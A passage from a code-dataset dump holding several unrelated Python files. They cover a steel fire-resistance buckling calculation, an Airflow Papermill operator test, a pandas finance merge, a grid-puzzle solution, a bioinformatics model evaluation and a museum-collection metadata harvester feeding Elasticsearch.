chi_LT_fi = (phi_LT_theta_com + (phi_LT_theta_com**2-lambda_LT_theta_com**2))**-0.5\n\n return chi_LT_fi\n\ndef _M_b_fi_t_Rd(chi_LT_fi, W_y, k_y_theta_com, f_y, gamma_M_fi):\n \"\"\"\n [Eq. 5.61]\n :param chi_LT_fi: Reduction factor for lateral-torsion buckling in the fire design situation\n :param W_y: Sectional modulus (plastic for class 1 steel)\n :param k_y_theta_com: Reduction factor for yield strength at elevated temperature\n :param f_y: Steel yield strength\n :param gamma_M_fi: Partial safety factor\n :return M_b_fi_t_Rd: The resistant lateral torsion bending moment\n \"\"\"\n\n M_b_fi_t_Rd = chi_LT_fi * W_y * k_y_theta_com * f_y / gamma_M_fi\n\n return M_b_fi_t_Rd\n\n\nif __name__ == \"__main__\":\n # REQUIRED PARAMETERS\n C_1 = 1.77\n C_2 = 0.\n I_z = 11400.e-8 # m4\n\n k_z = 1. # conservative\n k_w = 1. # conservative\n I_w = 19.3e-6 # m6\n I_t = 514.e-8 # m4\n L = 2.5 # m\n E = 210e9 # Pa\n G = 81e9 # Pa\n z_g = 0.\n theta = 273.15 + 20 # K\n theta = np.arange(0, 550, 50) + 273.15\n\n W_py_y = 7980e-6 # m3\n W_y = W_py_y\n f_y = 345e6 # Pa\n\n gamma_M_fi = 1\n\n # Calculate: The strength reduction factor for steel in fire condition\n k_y_theta_com = thermal(\"reduction factor for effective yield strength\")(theta)\n k_E_theta_com = thermal(\"reduction factor for the slope of the linear elastic range\")(theta)\n\n # Calculate: The critical bending moment resistance\n M_cr = _M_cr(C_1, C_2, I_z, k_z, k_w, I_w, I_t, L, E, G, z_g)\n\n # Calculate: The non-dimensional slenderness at normal temperature\n lambda_LT = _lambda_LT(W_py_y, f_y, M_cr)\n\n # Calculate: The non-dimensional slenderness at elevated temperature\n lambda_LT_theta_com =_lambda_LT_theta_com(lambda_LT, k_y_theta_com, k_E_theta_com)\n\n # Calculate: The imperfection factor for material\n alpha = _alpha(f_y)\n\n # Calculate: A variable used for later\n phi_LT_theta_com = _phi_LT_theta_com(alpha, lambda_LT_theta_com)\n\n # Calculate: The reduction factor for lateral torsion in fire condition\n chi_LT_fi = _chi_LT_fi(phi_LT_theta_com, lambda_LT_theta_com)\n\n # Calculate: The lateral torsion buckling moment resistance in fire condition\n M_b_fi_t_Rd = _M_b_fi_t_Rd(chi_LT_fi, W_y, k_y_theta_com, f_y, gamma_M_fi)\n\n # OUTPUTS\n print(\"The elastic resistance moment for lateral torsion is: {:.2f} MN m.\".format(M_cr * 1e-6))\n print(\"The design lateral-torsional buckling resistance moment is: {:.2f} MN m.\".format(M_b_fi_t_Rd * 1e-6))\n","sub_path":"project/func/structural_steel.py","file_name":"structural_steel.py","file_ext":"py","file_size_in_byte":5787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"214077341","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\nfrom __future__ import annotations\n\nfrom unittest.mock import patch\n\nfrom airflow.models import DAG, DagRun, TaskInstance\nfrom airflow.providers.papermill.operators.papermill import PapermillOperator\nfrom airflow.utils import timezone\n\nDEFAULT_DATE = timezone.datetime(2021, 1, 1)\n\n\nclass TestPapermillOperator:\n @patch(\"airflow.providers.papermill.operators.papermill.pm\")\n def test_execute(self, mock_papermill):\n in_nb = \"/tmp/does_not_exist\"\n out_nb = \"/tmp/will_not_exist\"\n kernel_name = \"python3\"\n language_name = \"python\"\n parameters = {\"msg\": \"hello_world\", \"train\": 1}\n\n op = PapermillOperator(\n input_nb=in_nb,\n output_nb=out_nb,\n parameters=parameters,\n task_id=\"papermill_operator_test\",\n kernel_name=kernel_name,\n language_name=language_name,\n dag=None,\n )\n\n op.execute(context={})\n\n mock_papermill.execute_notebook.assert_called_once_with(\n in_nb,\n out_nb,\n parameters=parameters,\n kernel_name=kernel_name,\n language=language_name,\n progress_bar=False,\n report_mode=True,\n )\n\n def test_render_template(self):\n args = {\"owner\": \"airflow\", \"start_date\": DEFAULT_DATE}\n dag = DAG(\"test_render_template\", default_args=args)\n\n operator = PapermillOperator(\n task_id=\"render_dag_test\",\n input_nb=\"/tmp/{{ dag.dag_id }}.ipynb\",\n output_nb=\"/tmp/out-{{ dag.dag_id }}.ipynb\",\n parameters={\"msgs\": \"dag id is {{ dag.dag_id }}!\"},\n kernel_name=\"python3\",\n language_name=\"python\",\n dag=dag,\n )\n\n ti = TaskInstance(operator, run_id=\"papermill_test\")\n ti.dag_run = DagRun(execution_date=DEFAULT_DATE)\n ti.render_templates()\n\n assert \"/tmp/test_render_template.ipynb\" == operator.input_nb\n assert \"/tmp/out-test_render_template.ipynb\" == operator.output_nb\n assert {\"msgs\": \"dag id is test_render_template!\"} == operator.parameters\n assert \"python3\" == operator.kernel_name\n assert \"python\" == operator.language_name\n","sub_path":"tests/providers/papermill/operators/test_papermill.py","file_name":"test_papermill.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"355376446","text":"import pandas as pd\nimport functions as f\n\neNO = f.readExcelFromFolder('excel', 'ExpensesNonOrder')\nsupplierOrder = f.readExcelFromFolder('excel', 'SupplierOrder')\ninv = f.readExcelFromFolder('excel', 'Invoice')\norder = f.readExcelFromFolder('excel', 'Order')\nBookOrder = f.readExcelFromFolder('excel', 'BookOrder')\nBooks = f.readExcelFromFolder('excel', 'Books')\n\n\nBooks = Books.filter(['book_ID', 'book_salesPrice']).rename(columns={\"book_ID\": \"id\", \"book_salesPrice\": \"price\"}, inplace=False)\nBookOrder = BookOrder.rename(columns={\"bookOrder_bookID\": \"id\", \"bookOrder_quantity\": \"quantity\"}, inplace=False).merge(Books, on = 'id').rename(columns={'bookOrder_orderID':'orderID'}, inplace=False)\n\n\nBookOrder = BookOrder.merge(order.filter(['order_ID', 'order_date']).rename(columns={'order_ID':'orderID', 'order_date':'date'}, inplace=False), on='orderID')\nBookOrder[['quantity', 'price']] = BookOrder[['quantity', 'price']].astype(float)\nBookOrder['bookOrder_total'] = BookOrder['quantity'] * BookOrder['price']\n\neNO = eNO.rename(columns={'exp_invoiceID':'invID'}, inplace=False)\neNO[['exp_date']] = eNO[['exp_date']].astype('datetime64')\neNOInv = eNO.merge(inv.rename(columns={'invoice_ID':'invID', 'invoice_amount':'invTotal'}, inplace=False), on = 'invID')\neNOInv = eNOInv.rename(columns={'exp_date':'date'}, inplace=False)\n\n\nsupplierOrder = supplierOrder.rename(columns={'sO_bookID':'id', 'sO_datetime': 'date'}, inplace=False)#['date'].astype('datetime64')\nsupplierOrder[['date']] = supplierOrder[['date']].astype('datetime64')\nsupplierOrder = supplierOrder.merge(Books, on = 'id')\nsupplierOrder['sO_total'] = (supplierOrder['sO_bookAmount'] * supplierOrder['price']).abs()*-1\n\n\n\ndays = pd.date_range(order['order_date'].min(), order['order_date'].max(), freq='D')\nmergeFrame = days.to_frame(index=False)\nmergeFrame = mergeFrame.rename(columns={0:'date'}, inplace=False)\n\n\n\nmergeFrame = mergeFrame.merge(supplierOrder, on='date', how='outer')\nmergeFrame = mergeFrame.merge(eNOInv, on='date', how='outer')\nmergeFrame = mergeFrame.merge(BookOrder, on='date', how='outer')\nmergeFrame = mergeFrame.filter(['date', 'sO_total', 'invTotal', 'bookOrder_total'])","sub_path":"revenueAndExpensesFeeder.py","file_name":"revenueAndExpensesFeeder.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"372779420","text":"import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10 ** 7)\n\nC = []\n\nH, W = map(int, input().split())\nfor i in range(H):\n l_str = list(input().strip())\n C.append(l_str)\n\ndef gcd(a, b):\n while b != 0:\n a, b = b, a%b\n return a\n\ndef size(x, y):\n k = 1\n l = 1\n while(C[y][x+k] == \"o\"):\n k += 1\n while(C[y+l][x] == \"o\"):\n l += 1\n g = gcd(k, l)\n return g, k//g, l//g\n\ndef abc(size, x, y, cx, cy):\n corner = [[4, 5], [5, 4], [1, 3]]\n if [x, y] in corner or ([x, y] == [3, 1] and C[cy+size][cx-size] == \".\"):\n bx = max(0, cx - 1*size)\n bx2 = min(W, cx + 5*size)\n else:\n bx = max(0, cx - 2*size)\n bx2 = min(W, cx + 4*size)\n by = min(H, cy + 5*size)\n count = 0\n for i in range(cy, by):\n for j in range(bx, bx2):\n if C[i][j] == \"o\":\n C[i][j] = \".\"\n count += 1\n d = count // (size**2)\n\n if d == 12:\n ans[0] += 1\n elif d == 16:\n ans[1] += 1\n elif d == 11:\n ans[2] += 1\n else:\n ans[3] += 1\n\n\nans = [0, 0, 0, 0]\nfor i in range(H):\n for j in range(W):\n if C[i][j] == \"o\":\n s, x, y = size(j, i)\n abc(s, x, y, j, i)\n\nprint(ans[0], ans[1], ans[2])\n","sub_path":"ARC/ARC005/D_2.py","file_name":"D_2.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"291538522","text":"from QSP400 import dataPro as data\nimport numpy as np\nfrom keras import optimizers\nfrom keras.models import model_from_yaml\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve, auc\naac,label=data.fe()\ngaac=data.gaac()\nac_p,label=data.deal()\nyaml_string = open('model_arthitecture_2.yaml', 'r')\nmodel = model_from_yaml(yaml_string)\nyaml_string_lstm = open('lstm.yaml', 'r')\nmodel_lstm = model_from_yaml(yaml_string_lstm)\nx_test = np.concatenate(( aac,gaac,ac_p),axis=1)\nprint(x_test.shape)\n\n\nall_labels=[]\nall_prob = {}\nall_prob[0] = []\nreal_labels = []\nfor val in label:\n if val == 1:\n real_labels.append(1)\n else:\n real_labels.append(0)\ntrain_label_new = []\n# global all_labels\n# global all_prob\nall_labels = all_labels + real_labels\n\ndef transfer_label_from_prob(proba):\n label = [1 if val >= 0.6 else 0 for val in proba]\n return label\ndef calculate_performace(test_num, pred_y, labels):\n tp = 0\n fp = 0\n tn = 0\n fn = 0\n for index in range(test_num):\n if labels[index] == 1:\n if labels[index] == pred_y[index]:\n tp = tp + 1\n else:\n fn = fn + 1\n else:\n if labels[index] == pred_y[index]:\n tn = tn + 1\n else:\n fp = fp + 1\n print('tp:',tp,'fn:',fn,'tn:',tn,'fp:',fp)\n acc = float(tp + tn) / test_num\n precision = float(tp) / (tp + fp)\n sensitivity = float(tp) / (tp + fn)\n specificity = float(tn) / (tn + fp)\n MCC = float(tp * tn - fp * fn) / (np.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn)))\n return acc, precision, sensitivity, specificity, MCC\nimport joblib\nall_prob_svc={}\nall_prob_svc[0]=[]\ndef threeDependent(model):\n svc_proba = model.predict(x_test)\n all_prob_svc[0] = all_prob_svc[0] + [val for val in svc_proba]\n y_pred_svc = transfer_label_from_prob(svc_proba)\n # acc=calculate_performace(len(real_labels), y_pred_xgb, real_labels)\n acc, precision, sensitivity, specificity, MCC = calculate_performace(len(label), y_pred_svc, label)\n fpr_1, tpr_1, thresholds_1 = roc_curve(all_labels, all_prob_svc[0]) # probas_[:, 1])\n AUC = auc(fpr_1, tpr_1)\n return acc, precision, sensitivity, specificity, MCC,AUC\nall_prob_lstm={}\nall_prob_lstm[0]=[]\nopt = optimizers.Adam(lr=0.001)\n\ndef lstmDependent(model):\n opt = optimizers.Adam(lr=0.001) # 0.01\n model_lstm.compile(optimizer=opt, loss='binary_crossentropy', metrics=['accuracy'])\n model_lstm.fit(x_test, label, batch_size=5, epochs=30)\n lstm_proba = model_lstm.predict_proba(x_test)\n print(lstm_proba)\n all_prob_lstm[0] = all_prob_lstm[0] + [val for val in lstm_proba]\n y_pred_lstm = transfer_label_from_prob(lstm_proba)\n # acc=calculate_performace(len(real_labels), y_pred_xgb, real_labels)\n acc, precision, sensitivity, specificity, MCC = calculate_performace(len(label), y_pred_lstm, label)\n fpr_4, tpr_4, thresholds_4 = roc_curve(all_labels, all_prob_lstm[0]) # probas_[:, 1])\n AUC = auc(fpr_4, tpr_4)\n return acc, precision, sensitivity, specificity, MCC, AUC\n\ndef myDependent(model):\n opt = optimizers.Adam(lr=0.001) # 0.01\n model.compile(optimizer=opt, loss='binary_crossentropy', metrics=['accuracy'])\n model.fit(x_test, label, batch_size=5, epochs=30)\n lstm_cnn_proba = model.predict_proba(x_test)\n print(lstm_cnn_proba)\n all_prob[0] = all_prob[0] + [val for val in lstm_cnn_proba]\n y_pred_lstm_cnn = transfer_label_from_prob(lstm_cnn_proba)\n # acc=calculate_performace(len(real_labels), y_pred_xgb, real_labels)\n print(\"label\",label.shape)\n print(len(y_pred_lstm_cnn))\n acc_lstm_cnn, precision, sensitivity, specificity, MCC = calculate_performace(len(label), y_pred_lstm_cnn, label)\n fpr_3, tpr_3, thresholds_3 = roc_curve(all_labels, all_prob[0]) # probas_[:, 1])\n AUC = auc(fpr_3, tpr_3)\n return acc_lstm_cnn, precision, sensitivity, specificity,MCC,AUC\n\nprint(\"acc, precision, sensitivity, specificity,MCC,AUC\")\nprint(\"------------------------------------------------\")\nsvm_model = joblib.load(\"svm.pkl\")\nacc1, precision1, sensitivity1, specificity1, MCC1, AUC1=threeDependent(svm_model)\n\nx_test = x_test.reshape((x_test.shape[0], x_test.shape[1], 1))\nlabel = np.array(label)\nlabel = label.reshape((label.shape[0], 1))\n\n\nyaml_string_lstm = open('lstm.yaml', 'r')\nmodel_lstm = model_from_yaml(yaml_string_lstm)\nacc2, precision2, sensitivity2, specificity2, MCC2, AUC2=lstmDependent(model_lstm)\n\nyaml_string = open('model_arthitecture_2.yaml', 'r')\nmodel = model_from_yaml(yaml_string)\nacc3, precision3, sensitivity3, specificity3, MCC3, AUC3=myDependent(model)\n\n\nprint(\"svm\",acc1, precision1, sensitivity1, specificity1, MCC1, AUC1)\nprint('lstm',acc2, precision2, sensitivity2, specificity2, MCC2, AUC2)\nprint('our',acc3, precision3, sensitivity3, specificity3, MCC3, AUC3)\nprint(\"------------------------------------------------\")\n\n\ndef plot_roc_curve(labels, probality, legend_text, auc_tag=True):\n # fpr2, tpr2, thresholds = roc_curve(labels, pred_y)\n fpr, tpr, thresholds = roc_curve(labels, probality) # probas_[:, 1])\n roc_auc = auc(fpr, tpr)\n if auc_tag:\n rects1 = plt.plot(fpr, tpr, label=legend_text + ' (AUC=%6.3f) ' % roc_auc)\n else:\n rects1 = plt.plot(fpr, tpr, label=legend_text)\n\nplt.savefig('路径', dpi=300) #指定分辨\n\n\n# plt.boxplot(x = (Acc_svm,Acc_rfc,Acc_lstm_cnn,Acc_lstm),\n# patch_artist=True,\n# labels = ('SVM','RF','proposed method','LSTM'), # 添加x轴的刻度标签\n# showmeans=True,showfliers=True,\n # boxprops = {'color':'black','facecolor':'steelblue'},\n # flierprops = {'marker':'o','markerfacecolor':'red', 'markersize':5},\n # meanprops = {'marker':'D','markerfacecolor':'indianred', 'markersize':4},\n # medianprops={'linestyle':'--','color':'orange'}\n # )\n# plot_roc_curve(all_labels, all_prob_svc[0], 'SVM method')\n# plot_roc_curve(all_labels, all_prob_rfc[0], 'RF method')\n# plot_roc_curve(all_labels, all_prob[0], 'proposed method')\n# plot_roc_curve(all_labels, all_prob_lstm[0], 'LSTM method')\n# plt.plot([0, 1], [0, 1], 'k--')\n# plt.xlim([-0.05, 1])\n# plt.ylim([0, 1.05])\n# plt.title('ROC')\n# plt.legend(loc=\"lower right\")\n# plt.savefig(save_fig_dir + selected + '_' + class_type + '.png')\n# plt.show()\n\n\n# rfc_model = joblib.load(\"rfc.pkl\")\n# rfc_proba = rfc_model.predict(x_test)\n# all_prob_rfc[0] = all_prob_rfc[0] + [val for val in rfc_proba]\n# y_pred_rfc = transfer_label_from_prob(rfc_proba)\n# # acc=calculate_performace(len(real_labels), y_pred_xgb, real_labels)\n# acc_rfc, precision, sensitivity, specificity, MCC = calculate_performace(len(label), y_pred_rfc, label)\n# ACC_rfc.append(acc_rfc)","sub_path":"QSP400/independent_Ver.py","file_name":"independent_Ver.py","file_ext":"py","file_size_in_byte":6808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"150328666","text":"import requests,json, sys, collections, argparse\r\nfrom requests.auth import HTTPBasicAuth\r\nfrom transfer_mars_lib import *\r\nfrom elasticsearch import Elasticsearch\r\nimport copy\r\n\r\nes=None\r\ncreate_es=False\r\n\r\nroot_list_institutions=\"https://collections.naturalsciences.be/cpb/nh-collections/institutions/institutions\"\r\nurl_suffix_collection=\"/2-cetaf-passport-collections/collections/collections\"\r\nurl_suffix_geo=\"/collection_geography\"\r\nurl_suffix_mids=\"/list-mids\"\r\nsearch_index=\"cetaf_passport_collections\"\r\ndata_index=\"cetaf_passport_collections_full\"\r\nes_server_name=None\r\ncurrent_institution_name=\"\"\r\ncurrent_institution_url=\"\"\r\ncheck_date=None\r\ncheck_date_default=\"2021-01-01T00:00:00+02:00\"\r\nall_arrays={}\r\nparent_children={}\r\n\r\n\r\n\r\ndef get_mids(p_url, es_content_full, auth_mars):\r\n print(\"MIDS_URL\")\r\n print(p_url)\r\n data=requests.get(p_url, headers={'accept':'application/json', 'Accept-Charset':'iso-8859-1'}, auth=auth_mars)\r\n p_dict=json.loads(data.text)\r\n mids_geography_category = get_value_field(p_dict,\"mids_geography_category\")\r\n mids_geography_mids_0 = get_value_field(p_dict,\"mids-geography_mids_0\")\r\n mids_geography_mids_1 = get_value_field(p_dict,\"mids-geography_mids_1\")\r\n mids_geography_mids_2 = get_value_field(p_dict,\"mids-geography_mids_2\")\r\n mids_geography_mids_3 = get_value_field(p_dict,\"mids-geography_mids_3\")\r\n mids_quantity = get_value_field(p_dict,\"mids-geography_object_quantity\")\r\n if not mids_quantity is None: \r\n mids={}\r\n #TEMP\r\n mids[\"taxonomic_category_name\"]=es_content_full[\"coverage_fields\"][\"main_category\"]\r\n mids[\"taxonomic_category_title\"]=es_content_full[\"coverage_fields\"][\"main_category\"]\r\n mids[\"countries_and_areas\"]=[] \r\n tmp_ctry={} \r\n tmp_ctry[\"area_type\"]=\"TDWG Zone\"\r\n tmp_ctry[\"area_name\"]=mids_geography_category\r\n mids[\"countries_and_areas\"].append(tmp_ctry)\r\n mids[\"taxonomic_category_quantity\"]=mids_quantity\r\n mids[\"taxonomic_category_mids_0_pc\"]=mids_geography_mids_0\r\n mids[\"taxonomic_category_mids_1_pc\"]=mids_geography_mids_1\r\n mids[\"taxonomic_category_mids_2_pc\"]=mids_geography_mids_2\r\n mids[\"taxonomic_category_mids_3_pc\"]=mids_geography_mids_3\r\n es_content_full[\"coverage_fields\"][\"taxonomic_discipline\"][\"taxonomic_category\"].append(mids)\r\n return mids_geography_category, mids_quantity, mids_geography_mids_0, mids_geography_mids_1, mids_geography_mids_2, mids_geography_mids_3\r\n\r\n\r\n\r\ndef explore_mids(p_url, es_content_full, auth_mars):\r\n global url_suffix_mids\r\n url_mids=p_url+url_suffix_mids\r\n print(\"MIDS_EXPLORE_URL\")\r\n print(url_mids)\r\n data=requests.get(url_mids, headers={'accept':'application/json', 'Accept-Charset':'iso-8859-1'}, auth=auth_mars)\r\n p_dict=json.loads(data.text)\r\n print(p_dict)\r\n sum_mids={}\r\n if \"items\" in p_dict:\r\n for item in p_dict[\"items\"]:\r\n print(item)\r\n if \"@type\" in item:\r\n if item[\"@type\"]==\"collection_mids_geography\":\r\n url=item[\"@id\"]\r\n mids_geography_category, mids_quantity, mids_geography_mids_0, mids_geography_mids_1, mids_geography_mids_2, mids_geography_mids_3 = get_mids(url, es_content_full, auth_mars)\r\n #print(\"mids_quantity\")\r\n #print(mids_quantity)\r\n #print(cast_to_int(mids_quantity))\r\n sum_tmp={}\r\n sum_tmp[\"quantity\"]=cast_to_int(mids_quantity)\r\n sum_tmp[\"mids_0\"]=cast_to_numeric(mids_geography_mids_0)\r\n sum_tmp[\"mids_1\"]=cast_to_numeric(mids_geography_mids_1)\r\n sum_tmp[\"mids_2\"]=cast_to_numeric(mids_geography_mids_2)\r\n sum_tmp[\"mids_3\"]=cast_to_numeric(mids_geography_mids_3)\r\n print(\"SUM_TMP\")\r\n print(sum_tmp)\r\n sum_mids[url]=sum_tmp\r\n #sum\r\n sum=0\r\n sum_mids0=0\r\n sum_mids1=0\r\n sum_mids2=0\r\n sum_mids3=0\r\n for key, sum_elem in sum_mids.items():\r\n sum += sum_elem[\"quantity\"]\r\n sum_mids0+=sum_elem[\"mids_0\"]/100*sum_elem[\"quantity\"]\r\n sum_mids1+=sum_elem[\"mids_1\"]/100*sum_elem[\"quantity\"]\r\n sum_mids2+=sum_elem[\"mids_2\"]/100*sum_elem[\"quantity\"]\r\n sum_mids3+=sum_elem[\"mids_3\"]/100*sum_elem[\"quantity\"]\r\n es_content_full[\"coverage_fields\"][\"taxonomic_discipline\"][\"sum_quantity\"]=sum\r\n if sum !=0:\r\n es_content_full[\"coverage_fields\"][\"taxonomic_discipline\"][\"sum_mids_0\"]=round((float(sum_mids0)/float(sum))*100,3)\r\n es_content_full[\"coverage_fields\"][\"taxonomic_discipline\"][\"sum_mids_1\"]=round((float(sum_mids1)/float(sum))*100,3)\r\n es_content_full[\"coverage_fields\"][\"taxonomic_discipline\"][\"sum_mids_2\"]=round((float(sum_mids2)/float(sum))*100,3)\r\n es_content_full[\"coverage_fields\"][\"taxonomic_discipline\"][\"sum_mids_3\"]=round((float(sum_mids3)/float(sum))*100,3)\r\n \r\ndef add_collection_es(index_name, current_id, es_content):\r\n global es\r\n es.update(index=index_name,id=current_id,body={'doc': es_content,'doc_as_upsert':True})\r\n\r\ndef find_parent(child_id):\r\n global parent_children\r\n for key, items in parent_children.items():\r\n for item in items:\r\n if item==child_id:\r\n return key\r\n return None \r\n \r\ndef explore_sub_collection_detail(p_url, p_dict,parent_url, auth_mars):\r\n global parent_children\r\n current_json={}\r\n print(p_dict)\r\n if parent_url in parent_children:\r\n tmp=parent_children[parent_url]\r\n else:\r\n tmp=[]\r\n tmp.append(p_url)\r\n parent_children[parent_url]=tmp\r\n copy_collection(p_url, p_dict, auth_mars, True)\r\n\r\ndef explore_sub_collection(p_url, parent_url, auth):\r\n global check_date\r\n #print(p_url)\r\n data=requests.get(p_url, headers={'accept':'application/json', 'Accept-Charset':'iso-8859-1'}, auth=auth_mars)\r\n p_dict=json.loads(data.text)\r\n if \"modified\" in p_dict:\r\n modified=p_dict[\"modified\"]\r\n if modified>check_date:\r\n #print(\"UPDATE!!!\")\r\n #print(modified)\r\n explore_sub_collection_detail(p_url, p_dict, parent_url, auth)\r\n \r\n\r\ndef parse_sub_collection_index(p_dict, elem, parent_url, auth_mars):\r\n if elem in p_dict:\r\n #print(\"INDEX\")\r\n #print(p_dict[elem])\r\n for item in p_dict[elem]:\r\n item_type=item[\"@type\"]\r\n coll_url=item[\"@id\"]\r\n print(\"TEST=\"+coll_url)\r\n if item_type==\"nh_sub_collection\":\r\n print(\"SUB_COLLECTION\")\r\n print(coll_url)\r\n explore_sub_collection(coll_url, parent_url, auth_mars)\r\n \r\ndef get_geography(p_url, auth_mars):\r\n print(\"URL_GEO=\")\r\n print(p_url)\r\n returned=[] \r\n data=requests.get(p_url, headers={'accept':'application/json', 'Accept-Charset':'iso-8859-1'}, auth=auth_mars)\r\n p_dict=json.loads(data.text)\r\n #print(p_dict)\r\n if \"countries\" in p_dict:\r\n if not p_dict[\"countries\"] is None:\r\n if isinstance(p_dict[\"countries\"], list):\r\n for item in sorted(p_dict[\"countries\"]):\r\n returned.append(item)\r\n return returned \r\n \r\n \r\ndef copy_collection(p_url, p_dict, auth_mars, sub_collection=False):\r\n global es\r\n global search_index\r\n global data_index\r\n global current_institution_name\r\n global current_institution_url\r\n global all_arrays\r\n global parent_children\r\n global url_suffix_geo\r\n print(\"------------------------\")\r\n print(\"FILL_URL\")\r\n print(p_url)\r\n print(\"------------------------\")\r\n json_parent=None\r\n current_json={}\r\n current_json_full={}\r\n current_json[\"coverage_fields\"]={}\r\n current_json[\"coverage_fields\"][\"countries_and_areas\"]=[]\r\n current_json[\"size_and_digitisation_fields\"]={}\r\n \r\n current_id=p_url\r\n \r\n current_json[\"institution_name\"]=current_institution_name\r\n current_json[\"to_parent_institution\"]=current_institution_url\r\n \r\n name_collection=get_value_field(p_dict, \"description\")\r\n \r\n \r\n size_collection=get_value_field(p_dict, \"number_of_specimens_\")\r\n if not size_collection is None:\r\n current_json[\"size_and_digitisation_fields\"][\"specimens_count\"]=size_collection\r\n \r\n #after child explore=> geo\r\n if not name_collection is None:\r\n if sub_collection:\r\n url_parent=find_parent(p_url)\r\n print(\"URL_PARENT=\")\r\n print(url_parent)\r\n json_parent=all_arrays[url_parent]\r\n current_json[\"coverage_fields\"][\"main_category\"]=\"Sub collection\"\r\n #current_json[\"coverage_fields\"][\"main_category\"]=json_parent[\"coverage_fields\"][\"main_category\"]\r\n #current_json[\"coverage_fields\"][\"taxonomic_discipline\"]=name_collection\r\n else:\r\n current_json[\"coverage_fields\"][\"main_category\"]=\"main collection\"\r\n #current_json[\"coverage_fields\"][\"main_category\"]=name_collection\r\n current_json[\"coverage_fields\"][\"taxonomic_discipline\"]=name_collection\r\n areas={}\r\n areas=get_geography(p_url+url_suffix_geo, auth_mars)\r\n for area in areas:\r\n print(area)\r\n new_area={}\r\n new_area[\"area_name\"]=area\r\n current_json[\"coverage_fields\"][\"countries_and_areas\"].append(new_area)\r\n all_arrays[p_url]=current_json\r\n parse_sub_collection_index(p_dict, \"items\", p_url, auth_mars)\r\n es_content=current_json\r\n \r\n add_collection_es(search_index, current_id,es_content)\r\n es_content_full=copy.deepcopy(es_content)\r\n \r\n #es_content_full[\"coverage_fields\"].pop(\"taxonomic_discipline\", None)\r\n #es_content_full[\"coverage_fields\"][\"taxonomic_discipline\"]={}\r\n #GOOD ?\r\n es_content_full[\"coverage_fields\"][\"name_taxonomic_category\"]=name_collection\r\n abstract=get_value_field(p_dict, \"abstract\")\r\n es_content_full[\"collection_abstract\"]=abstract\r\n description=get_value_field(p_dict, \"description\")\r\n es_content_full[\"collection_description\"]=description\r\n \r\n types_count=get_value_field(p_dict, \"primary_types\")\r\n es_content_full[\"size_and_digitisation_fields\"][\"primary_types_count\"]=types_count\r\n \r\n units=get_value_field(p_dict, \"number_of_units\")\r\n es_content_full[\"size_and_digitisation_fields\"][\"units_count\"]=format_if_not_none(units)\r\n \r\n others=get_value_field(p_dict, \"other_size_indicator\")\r\n es_content_full[\"size_and_digitisation_fields\"][\"other_size_indicators\"]=others\r\n \r\n owc=get_value_field(p_dict, \"owc_evaluation\")\r\n es_content_full[\"size_and_digitisation_fields\"][\"owc_size_evaluation\"]=owc\r\n es_content_full[\"coverage_fields\"].pop(\"taxonomic_discipline\", None)\r\n es_content_full[\"coverage_fields\"][\"taxonomic_discipline\"]={}\r\n es_content_full[\"coverage_fields\"][\"taxonomic_discipline\"][\"taxonomic_category\"]=[]\r\n explore_mids(p_url, es_content_full, auth_mars)\r\n print(\"ES_CONTENT_FULL===>\")\r\n print(es_content_full)\r\n add_collection_es(data_index, current_id,es_content_full)\r\n #es.update(index=search_index,id=current_id,body={'doc': es_content,'doc_as_upsert':True})\r\n\r\ndef get_collection(p_url, auth_mars):\r\n print(p_url)\r\n data=requests.get(p_url, headers={'accept':'application/json', 'Accept-Charset':'iso-8859-1'}, auth=auth_mars)\r\n p_dict=json.loads(data.text)\r\n #print(dict)\r\n not_null_id=p_dict[\"collection_id\"]\r\n print(\"collection_name\")\r\n print(not_null_id)\r\n if not not_null_id is None:\r\n print(\"PARSE___!\")\r\n copy_collection(p_url,p_dict, auth_mars )\r\n \r\ndef parse_collections(p_url, auth_mars):\r\n print(\"collection list:\")\r\n print(p_url)\r\n data=requests.get(p_url, headers={'accept':'application/json', 'Accept-Charset':'iso-8859-1'}, auth=auth_mars)\r\n p_dict=json.loads(data.text)\r\n list_collections=p_dict[\"items\"]\r\n print(list_collections)\r\n for item in list_collections:\r\n print(item)\r\n if item[\"@type\"]==\"nh_collection\":\r\n print(\"go\")\r\n get_collection(item[\"@id\"], auth_mars)\r\n\r\n \r\n\r\n#def parse_institution_detail(p_url):\r\n# parse_collections(p_url)\r\n\r\ndef parse_institution(p_url, auth_mars):\r\n global url_suffix_collection\r\n global current_institution_name\r\n global current_institution_url\r\n current_institution_name=\"\"\r\n current_institution_url=\"\"\r\n data=requests.get(p_url, headers={'accept':'application/json', 'Accept-Charset':'iso-8859-1'}, auth=auth_mars)\r\n p_dict=json.loads(data.text)\r\n\r\n name_museum=p_dict[\"title\"]\r\n print(name_museum)\r\n if not name_museum is None:\r\n if len(name_museum.lower().strip())>0:\r\n current_institution_name=name_museum\r\n current_institution_url=p_dict[\"@id\"]\r\n parse_collections(p_url+url_suffix_collection, auth_mars)\r\n \r\ndef get_collections(p_url, auth_mars):\r\n data=requests.get(p_url, headers={'accept':'application/json', 'Accept-Charset':'iso-8859-1'}, auth=auth_mars)\r\n p_dict=json.loads(data.text)\r\n go=True\r\n i=0\r\n while go:\r\n current=p_dict[\"batching\"][\"@id\"]\r\n if \"next\" in 